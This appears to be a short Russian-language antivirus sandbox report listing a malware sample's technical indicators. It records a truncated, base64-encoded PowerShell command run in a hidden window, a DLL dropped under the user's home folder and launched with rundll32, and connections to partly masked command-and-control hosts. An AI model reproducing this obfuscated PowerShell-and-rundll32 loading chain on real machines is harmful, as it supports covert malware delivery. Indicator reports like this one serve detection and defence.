Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABSADIAcgAyAGsAbwB0AD0AKAAnAEIAJwArACgAJwB2AG8AMwBsACcAKwAnAHUAJwApACsAJwA3ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAVQBTAGUAUgBwAHIATw...
- %HOMEPATH%\mg3c330\n2cn5kh\xh5qh7.dll
- 'ta###rise.org':443
- '67.##.105.174':3786
- DNS ASK ta###rise.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABSADIAcgAyAGsAbwB0AD0AKAAnAEIAJwArACgAJwB2AG8AMwBsACcAKwAnAHUAJwApACsAJwA3ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAVQBTAGUAUgBwAHIATw...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Mg3c330\N2cn5kh\Xh5qh7.dll 0